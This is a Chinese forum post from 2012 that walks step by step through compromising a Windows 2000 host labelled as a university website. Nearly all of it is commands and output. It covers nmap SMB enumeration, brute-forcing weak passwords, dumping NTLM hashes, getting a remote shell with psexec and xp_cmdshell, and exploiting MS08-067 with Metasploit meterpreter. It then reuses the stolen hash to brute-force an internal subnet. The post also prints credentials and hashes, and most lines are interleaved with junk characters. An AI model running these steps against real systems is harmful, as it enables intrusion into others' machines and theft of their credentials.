广西师范网站http://202.103.242.241/) q7 A7 }$ n# W2 X; D
1 Z- X8 K" W' k/ L2 S) U
root@bt:~# nmap -sS -sV 202.103.242.241+ @6 Q) D2 w. k0 x J4 J1 k
: w$ w2 P7 @0 [8 M$ l" x
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
! Q w. x1 |, l7 i2 F2 b, {/ Q8 g, C6 J, y7 z
Nmap scan report for bogon (202.103.242.241)
5 Z/ p5 G# q5 a! E& b5 q* y# M1 T" ~/ \: c1 j" x* P" m$ s
Host is up (0.00048s latency)." K" j' A3 D6 I9 K/ V* u4 i) q
, X# V/ P/ J' I
Not shown: 993 closed ports
8 @5 H D, q& z' S, Y+ j/ c! ~0 l, I2 `
PORT STATE SERVICE VERSION: h2 s) d! J! l
( P; K# C2 r( u/ q0 ]$ g1 w
135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)6 F: u0 p4 s2 b1 u( {5 ~
3 c" _1 [2 I2 l
139/tcp open netbios-ssn
3 K# O* m0 o9 Q
1 V. |+ }% E8 [445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds
0 @% |% k0 [- j g1 Y# m
3 B$ R: |& @9 V1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)# I1 M) k. c; Y9 W2 r: l) ?
' g3 q7 A) W' e
1026/tcp open msrpc Microsoft Windows RPC
& ^$ E1 E3 i9 t& w& }1 O: G3 J3 _$ d! E+ B
3372/tcp open msdtc?
1 L4 b, a* b( p" ?+ F: ~! `
$ K8 H6 e6 J9 `1 K7 W% o6 M. \3389/tcp open ms-term-serv?
7 o' H8 l& {( Z. J. y) P" ?4 h4 p
; w0 T+ A" F/ n$ @2 D% y1 M; z1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
+ R3 N. J8 r; A! M) U MSF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r; X$ {4 p7 r: q& Q
6 R) G _1 b5 @9 q- lSF GetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions
3 d: Y. P6 R% P& b4 J+ K. k- h) {4 t2 t5 [8 V
SF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)
2 C/ D( {, V X$ S
; x/ t" _/ w2 F7 h! e: USF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO9 z+ G# `- N% g. O
* j) \: l1 I3 I( V. K
SF:ptions,6,”hO\n\x000Z”);/ j9 z; N o5 R: _
4 x, f l! p! s% c% Q' T s i: p( S9 P
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
$ s2 T8 b2 N, D* ~+ {% m6 C/ U& y! R: Q& j8 i ]; A. L
Service Info: OS: Windows- S" ?; E9 \! C) m( r' F
! \! z' A1 l8 F: i( }: v& i
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
6 I- J# v7 T, h9 t% K" |# g r+ [, |3 i+ I. k4 k
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds( k4 u4 G/ s) o4 i" ^
- H9 @% a' r) _
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本0 i. A9 X$ @2 K u6 a
L' J! C" n9 Q3 O, I
-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse
3 o1 V. [1 M% z: d9 T& v. B2 o
' ^' Y+ @. B* Z% G9 F/ m-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
- b, v2 I; ^* a H: k- S' ]$ W, [ y0 S$ R0 T% _: M/ c9 E
-rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse, H& p. h7 U V4 u$ c x
; a* ? ~$ P1 p. }% `7 g5 x8 z* M T-rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse- U6 ]) A$ R& d2 u% ]
7 P" ]0 s2 K: n-rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse: T* k3 D1 J# `. i
6 K* p# A+ I6 O' Q+ f
-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
4 t: w+ e; i, u; Z0 R
, X, V K' J" x! Z: R-rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse" }! O) R; K5 ]' j' b$ R5 E
# }- _0 ]+ R( T, F% Y5 d8 y
-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse! Y$ e7 T+ z, Y
- V3 n* p6 W' q# U-rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse
% c$ `4 h5 @5 @# A
, z9 ]' \6 `% x: m T0 W-rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse
8 J" U* [4 A. Q/ ]. B* C9 k5 j# b; ~% B3 s
-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse6 J, y/ h. L* X( p# f
: H$ c3 V3 S9 d: c
-rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse% P" |* F- J, p) g0 v
6 \" d, I1 V: S. n4 j5 i
-rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse' D" @* ^/ T& a
8 T& D1 K0 A3 e; e1 o: Y+ Q+ F-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse
" A6 M3 N6 [; k+ L V# Y" R$ p
-rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse
1 `6 \' D6 {, V- C3 ?) b9 p# ]& N2 B G; N
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241 2 `" {, z* P9 `# T( @5 v2 W
' K* S; x+ f9 A( B) l
//此乃使用脚本扫描远程机器所存在的账户名
" z/ T* U" M: \( h6 K, ~
' w' x% ]) W+ T/ f) h/ a0 v+ oStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST) |3 a, S7 J- W* L$ [/ W0 D5 p
+ u) W% N# I+ g9 O) X3 D
Nmap scan report for bogon (202.103.242.241), l" g) L0 R5 `5 N/ Y
$ N; Q2 L; j- d6 l1 K. |Host is up (0.00038s latency).
, t6 B& S) i# n$ k4 K8 F5 F
q* p! o# Z; [6 V2 W4 BNot shown: 993 closed ports1 ~/ }( F: i6 _7 L2 D
, P& L! P+ f! T5 G+ q* U- t9 b
PORT STATE SERVICE
% R8 V7 X* l7 A A4 L3 D& f
' N& u. u4 U; l& R2 `: f/ c% j2 S135/tcp open msrpc
! t, a* c) K1 z8 l3 T# T+ G) d9 \# x# C! H3 Q, s. C3 e
139/tcp open netbios-ssn" T0 a5 H+ w% a% N3 \
4 E- k7 c3 F- o) |4 S
445/tcp open microsoft-ds
2 p/ G# A" z. L& O
- u G; v. S7 S6 [8 J1025/tcp open NFS-or-IIS$ V) O% ]" I' X6 L- [9 R9 j
1 U6 {. W: Y Z9 H: z
1026/tcp open LSA-or-nterm
l( P6 }+ h0 J7 j* E. ]$ s2 C0 G! T$ d; j& R2 g2 A( u) x
3372/tcp open msdtc5 k2 ?( L- Y) v% u0 z3 Y! e
0 d: z2 ~7 F, Q6 B( @% I
3389/tcp open ms-term-serv$ ~4 ?' S! @. X- ^* b
) T+ g6 z4 V. f/ j1 C7 J% @, M
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
2 j& ^8 b/ z% j- B& ?
& y% ?# y5 o* k5 o9 ]Host script results:
3 u5 G4 F- x8 U+ P. \1 [- ^
$ { o6 ~( A. ?| smb-enum-users:* ~7 c# _5 D0 ~
- U; I7 X: {7 p/ g0 s. `, X1 V; v0 H|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果) O5 i* b t! z7 Z- m, _$ Q
0 P: B/ Q7 E' v+ e# ^- BNmap done: 1 IP address (1 host up) scanned in 1.09 seconds: T' k* d5 |- [5 \4 {7 y5 e
6 B5 C6 z0 f! D/ F9 hroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241 # J7 M" ?1 f1 O( n3 Z7 g+ x
& f4 J4 c: R6 A. B5 Z
//查看共享1 Q8 G4 N3 q. B) v2 T' C
* G O" N2 E% w! ZStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
5 t5 I8 l( w! r8 b3 o1 q& \2 ^2 [& `& v c
Nmap scan report for bogon (202.103.242.241)
) b" H- v% V- I3 [+ n% J3 Q L2 x- H- [7 R6 v3 }" y# _
Host is up (0.00035s latency).+ Y* \. Q A5 p, G( X {
# E+ n6 z4 Y8 z* i4 n
Not shown: 993 closed ports
, R* r( F( x) `) \- U& c, S$ K7 G# g! l- q
PORT STATE SERVICE3 A+ I. |( f5 I3 ^
) D3 A1 j& w# h8 k5 x4 W
135/tcp open msrpc
7 W# e* e8 z3 g6 S: @! h" C0 j" ]/ O0 g
139/tcp open netbios-ssn, ?7 R! b# h- W$ `5 A* D1 f7 h, K
& X( y: h; U: }445/tcp open microsoft-ds# m3 @- d' Z% t# D
; C& F: y! C9 F9 A1025/tcp open NFS-or-IIS
$ }2 K- Y4 O% U) _, X8 |0 q
* g" n& A; K# ~" L0 T0 b1026/tcp open LSA-or-nterm7 L/ {7 s4 [2 [) S
$ g! m7 J2 e# ~# f3 n$ ?/ P3372/tcp open msdtc
7 p- {* l- H" l/ _7 N
- C5 E3 v7 f& T; l; [5 x3389/tcp open ms-term-serv" H( e- N/ U" ]) Y, I
! \0 ?! O1 a: v' v; F- d# M n7 S
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
* N% h7 O- H8 |! l
' k) p* J0 { q( K8 P3 N3 l8 x; PHost script results:
4 o& X4 K+ m4 @: |8 T1 {
/ H, ?+ |$ V2 v4 S0 l! m0 s| smb-enum-shares:
$ I6 d# W- }; J: a7 n$ u
* _7 E! b, t+ w" |+ o! M" X| ADMIN$; K: N8 _( u8 b i/ S5 A
/ I& n+ B, L) n0 _: `
| Anonymous access: <none>" x: K1 X% E0 h
! `& X+ ]; Y/ @3 h7 S- {8 O| C$$ I1 I0 G9 U% Z" v; j8 @3 M
5 v0 R4 N0 I& o0 a8 }) K$ Q' Y' ~. L
| Anonymous access: <none>
) @: p' [' I$ j$ Z6 |' _( p( g0 ^ Y3 m( b0 K9 L: Q: \1 d5 e
| IPC$8 w) r0 ]* E: u5 B
4 S/ ]! r4 k% Z5 r6 ^) V, Y|_ Anonymous access: READ
! p8 S( R# U4 D& a. Z4 a/ _# n) g
Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds' o0 B6 a) m6 U1 {8 _, i; m7 Q
/ o) N2 H9 q q! d& B/ T0 Yroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241 ; x O5 i: x+ Z K8 w7 S8 m
6 g0 P' \& F# ` A4 X
//获取用户密码2 x% {7 J) l8 Q2 X
, k& a1 m% [/ r2 y: S2 jStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
. R/ ~$ v( X9 X$ D7 F2 {/ T- e
. q0 W. I% r: I( Y+ `/ ONmap scan report for bogon (202.103.242.2418)2 V7 [5 L6 j5 L" d
6 g$ k8 s# ]* R, \5 P1 @* RHost is up (0.00041s latency).
! i# h( I( \0 _& x" X9 ~
6 e8 |( ^' v! |& g. l; eNot shown: 993 closed ports
& u; Z* c% }; X5 n( H3 p* p; U1 f* a+ z' X/ c. y
PORT STATE SERVICE
( B* h& K+ a& j, u/ |$ X
. S3 v3 k! ^2 Y, U8 I( x135/tcp open msrpc
" A& p" ]4 ^) s. ?+ B. b- S5 L# `) j! x c f, ~, q9 n
139/tcp open netbios-ssn* k& c4 v- _1 ~7 Y; @! X
7 _6 l; o" }7 ]2 Q c/ t |. s
445/tcp open microsoft-ds ?2 r3 V ?8 d5 c
6 o% W& I7 @& F/ ]0 U9 d P
1025/tcp open NFS-or-IIS
/ Y8 f d% ?0 N
8 n6 v0 e1 l, c; J0 y# W: ~1 s1026/tcp open LSA-or-nterm9 x d1 T$ j- S2 _
; B* B; w s" J$ p& e6 R( n3372/tcp open msdtc
, i/ c; u' w8 G$ M3 k6 u) N: X2 X. X/ ?( E
3389/tcp open ms-term-serv! _- g' N5 [+ l! w m
* i1 n8 Y# n, D6 x4 @& g' l) [MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
) \2 s) p4 {1 @6 X3 z0 I8 U3 T3 q- X$ ]) d( V- o6 y# l* V1 }
Host script results:
- s. T D7 s5 u) K+ {
6 d) o, Q" S0 A8 a# ?3 f2 y| smb-brute:
3 p" ~) f6 P) Q1 p" X. `
* h+ I2 W3 A; a1 A$ oadministrator:<blank> => Login was successful
/ ~" O2 t: y1 {; t
9 H6 O1 J6 n Q$ j! f0 y2 f|_ test:123456 => Login was successful
- f; B# c1 g+ D2 N
, z* ~( T6 P& p, e7 O1 e9 o7 ~Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds
1 }. {, k+ g" U( S! ]
5 T! B9 V" [8 z% d! }1 A* qroot@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash
3 Y9 P4 `' y4 z' {% h6 E2 E0 d6 ^2 I6 l+ @, y
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
4 j; D: c1 V( ~# r) s; |, I
2 e% a* N& l/ Z, Croot@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse3 Z$ M1 s7 _; t+ F9 A% I
+ B% ]7 c3 l8 w: D# v+ e' \root@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,1395 Z2 G& N' Z7 Z) t
, r! ]# z4 N: a7 P8 m8 z0 nStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
/ ~2 q: m/ p6 R& g4 l$ M! u. Z/ u( i
Nmap scan report for bogon (202.103.242.241)
5 B0 [) k+ D& ~! Y" J. B* h" R7 G% j9 P, w( o
Host is up (0.0012s latency)." g9 ^2 P" C1 b! c1 Z
; k: i* G) o) _4 _" XPORT STATE SERVICE
; G( }1 ~5 b$ R, m; B5 w$ K
" o" h( ^7 C* j5 c* U& M: D8 Q135/tcp open msrpc
7 ?$ i7 ?) ~8 p' P8 k' l: l+ G5 S& a" \0 K4 J8 D
139/tcp open netbios-ssn/ k. X& J2 e5 ~- d, S3 H& p
: {4 E8 }5 M9 G# A445/tcp open microsoft-ds% W) u# _, m1 x+ F
; [( F' `8 Q- k, QMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)4 c: k2 e' W0 K2 Z! ]: }8 } E$ m
1 T6 X4 _$ N& E) |' S3 j
Host script results:
6 p: F ^/ g8 i: ~# Y
1 G0 |1 k# H+ K, }| smb-pwdump:
% @+ f- W5 B0 Y' F* o; x9 r' t+ W3 z& F' Q* j8 v" @
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************
6 B0 V# l. N1 l4 L, l; v! e' W! |. u% M1 o& ]
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
) k# @: w) l7 X. T7 U9 W9 k+ |7 Z/ \7 _4 b1 q; D9 z
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
, [$ X$ A: [; v8 H
# v. ]$ h# \) l: L& Z* A|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2, l( b0 n' q B1 V
) `4 W8 q$ _; cNmap done: 1 IP address (1 host up) scanned in 1.85 seconds
; ] J1 b( f! C' d2 s! [# p& K+ e2 R2 X$ D4 T6 x* v- R& T" T
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell
0 ~% K6 O- c" i# k0 i
. x% i+ s% S& ~( ~7 ?-p 123456 -e cmd.exe& G: }* T2 o5 i
5 Y, i; F. {+ `) J- `% UPsExec v1.55 – Execute processes remotely' t, G0 u6 o5 U
: _8 a+ d) G/ i
Copyright (C) 2001-2004 Mark Russinovich
) g' W4 E% |8 J
- T" P% Y2 \, j, E0 ISysinternals – www.sysinternals.com4 k/ w& p; z4 c
2 t* {7 M( `8 I0 R2 }
Microsoft Windows 2000 [Version 5.00.2195]0 C7 N z: m' r! I- O+ j
: L' T& h* C5 v: ]1 T% q& o6 d+ b. \
(C) 版权所有 1985-2000 Microsoft Corp.; t, |! m! r3 L; |* e# T
; M) |% @- ^6 o9 @% Y) a& L1 @
C:\WINNT\system32>ipconfig A& t+ g8 c7 Q& V3 I7 Z' q
4 P" `2 a3 Q" j1 c1 m4 V
Windows 2000 IP Configuration
3 r. h, p0 U/ b, I% C" c6 p7 Q, \7 o* g. d
Ethernet adapter 本地连接:
( V! `/ P: l* P! [1 H/ ?; I5 I1 J0 F; e% m* N3 c) m
Connection-specific DNS Suffix . :
1 ]+ X0 h5 Z: o! X- A& F
2 a! g5 |9 i1 C5 A" |) U1 ~IP Address. . . . . . . . . . . . : 202.103.242.241
2 S1 l+ y8 T Z2 S* ?* s+ ?6 m( h1 g# x+ Q, u
Subnet Mask . . . . . . . . . . . : 255.255.255.0, B8 z) l0 u7 b# [1 o/ U5 }9 a
; y6 r# _* ]' V0 {Default Gateway . . . . . . . . . : 202.103.1.1& X3 l* c1 }# ]/ q
' r- f) K* D" ^+ T" k/ h5 v4 tC:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令
" K9 L2 l# F: d1 z1 p
% r( | a' H$ vroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞9 }' }3 }6 k5 {1 r7 Y5 ^: H
; P: a: K( f$ N$ Z
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
% x7 L2 {! ]: _1 Z4 S
- n! f# H7 p. O# x& ^Nmap scan report for bogon (202.103.242.241)
( X5 S7 P$ r$ M0 _+ @2 H- N0 r' A% H l! d6 i+ \3 h% v
Host is up (0.00046s latency).
8 M5 v) n' g- M/ V0 {$ Z' r7 c) `5 i7 H, V- U3 c
Not shown: 993 closed ports
$ T) s& o1 h( m- z
3 e& R2 r9 K0 Y( r& D* ^) U) rPORT STATE SERVICE7 @: g+ F: s& I# C7 R2 Q
% B' S1 k" x0 r" c6 g& }135/tcp open msrpc, _' Q4 c+ t' W- Z$ a& i1 N4 I
7 k8 c% k4 e ]. C' A9 \7 {. F x. Z139/tcp open netbios-ssn2 |* c& m( f2 n j. K" n
, h+ O/ n2 p( E; g% C3 D3 ]7 R
445/tcp open microsoft-ds; A& T/ z( B9 r: s! @8 h
1 y& `* @0 M2 |1025/tcp open NFS-or-IIS# O s% g- k# W
" X, g- D0 ^0 c( h& K
1026/tcp open LSA-or-nterm/ B" k' F& B( W) r/ _
0 H, d# Y9 D; Z1 E1 q
3372/tcp open msdtc
/ ?4 `4 l! {6 m5 x* g
/ _5 V! w/ n' B$ u* g3389/tcp open ms-term-serv
6 T8 T' L8 a4 S- k; S- r1 q# L- M
& f7 C! c/ j" x# n, WMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)0 C" v6 q C: g3 @- C* f5 I
7 v2 A5 k4 }2 p( R$ k3 D
Host script results:
. O7 _1 r; Z+ b0 s7 a4 J" j7 T) D8 B
| smb-check-vulns:' X# c) c- z( B+ K0 C5 K2 B4 z7 ~
3 R* v9 E5 L7 U: C& D
|_ MS08-067: VULNERABLE
: h* R+ e& b2 o/ Q
) ^) ~/ z0 G3 G" x8 L: X2 ENmap done: 1 IP address (1 host up) scanned in 1.43 seconds l; E& \8 N0 a+ {" e
: ^% M) i& ?5 p/ n! y
root@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出0 B! t1 B2 X# |2 Y4 @$ J1 s
' Z% V. e) E4 E5 lmsf > search ms087 J9 g9 X( P1 E( h* {
& X. o& U5 N1 d6 K# i G7 d2 P0 E, d
msf > use exploit/windows/smb/ms08_067_netapi) r5 d. H4 h5 p; S8 P Y
+ v& v- @* @& e. D
msf exploit(ms08_067_netapi) > show options' {; D7 O5 z0 n; s+ }
" D7 O- g, \0 U: h5 a, N5 x
msf exploit(ms08_067_netapi) > set RHOST 202.103.242.241. r7 g! q! t2 b" t4 z+ I/ q# O; S
5 l$ U) n" R# m
msf exploit(ms08_067_netapi) > show payloads' i$ S% ]- o8 Q8 F1 ^
; L5 m( X+ \+ `3 Jmsf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp- n0 n6 H( I2 y
* C8 e, `# e0 }& n
msf exploit(ms08_067_netapi) > exploit
3 }' Y# t$ {. V, n/ e8 q& s. G5 ~( l8 q/ ~6 Z- y" V
meterpreter >
" k7 q& R+ I# D# h- N" W% |; |+ b" M: @ x/ ^ K" {. U# Y8 v% W
Background session 2? [y/N] (ctrl+z); U9 s. E9 c9 w4 c; {
5 {6 z% Z& N" C6 e
msf exploit(ms08_067_netapi) > sessions -l& {2 J! M* `0 a2 ^; z. W
3 ?0 n* t& v1 I( ?; J! Qroot@bt:/usr/local/share/nmap/scripts# vim usernames.txt5 w2 y; K2 ]1 _* l$ P. i4 `( _$ \) ~2 F" P
. V6 A& r$ E3 Y- a$ s
test
4 F; H( r3 G `4 L! ~9 a
5 O7 [- m6 @1 M wadministrator$ s; I/ b b6 O0 e, x
: H; l- Z7 t) f# a$ V3 ~, s. j* d
root@bt:/usr/local/share/nmap/scripts# vim password.txt
" z7 a; Q, N& s* O/ |: u0 e3 N4 w2 m: V) n8 v/ i U9 B
44EFCE164AB921CAAAD3B435B51404EE, R- i7 M1 t2 k9 D9 k
- g5 I3 f) d& v( G; L3 F
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
8 m4 ~: C' y* e1 i9 m7 g3 |( V( A0 c$ D( ]' i+ Z$ {" e" }
//利用用户名跟获取的hash尝试对整段内网进行登录
' n# p) d3 _+ o1 l- \; r( ~0 I& H6 c! N8 j# [9 e% u
Nmap scan report for 192.168.1.1052 `/ F8 w/ w7 [/ S6 ]' P
n4 B1 T$ }4 U( XHost is up (0.00088s latency).
# c% D% ^! U- y) S2 y: y" ?9 z x( I2 r2 o
Not shown: 993 closed ports, u9 G0 Q1 f, N
* ]3 S7 E3 I! D& ?7 w
PORT STATE SERVICE
/ \2 W6 e+ F3 t2 Y2 Q
- J4 Q* [1 E& `. A- ?; Z135/tcp open msrpc3 V3 l6 R! X% Z$ N, {
* h7 o! b" \4 R8 V9 `2 t139/tcp open netbios-ssn+ |4 H& ~$ M1 P0 R8 c
" B* `! H( F; u/ {# [) x
445/tcp open microsoft-ds' J& x- P0 {1 F$ f( F
/ d) \! l, `) `# {
1025/tcp open NFS-or-IIS3 | f6 E" f h- A4 ^4 s
6 @. R' J: w' a5 d( \$ I: f4 e
1026/tcp open LSA-or-nterm
8 Q) V& P% Y2 r+ d3 O& e, \4 \
. K! i8 ~2 F) E, w% n6 {! j3372/tcp open msdtc$ P( P) W+ U3 H. N- Y
: ~! D! k# U1 a3 S. G
3389/tcp open ms-term-serv
: N9 e/ |3 D, P
* L% ~3 K' D0 O0 U4 r3 iMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
5 s$ n. ?! @1 f. f9 T6 G- _' ~' B' ^, t% V9 P+ x
Host script results: L+ e6 Z# p' R B r
8 j% ]; O+ i, C8 h3 S0 `) ?| smb-brute:& [' d" w' ?3 X6 Y
, k! Y- V3 t; X! q: W
|_ administrator:<blank> => Login was successful9 t/ |4 [! P) \ j) v$ x: ~
/ X# d, ?7 e7 ]* [9 J h
攻击成功,一个简单的msf+nmap攻击~~·
}8 y% L d9 L
5 r) E! s" \) j6 I |
发表于 2012-12-4 12:46:42
收藏
支持
反对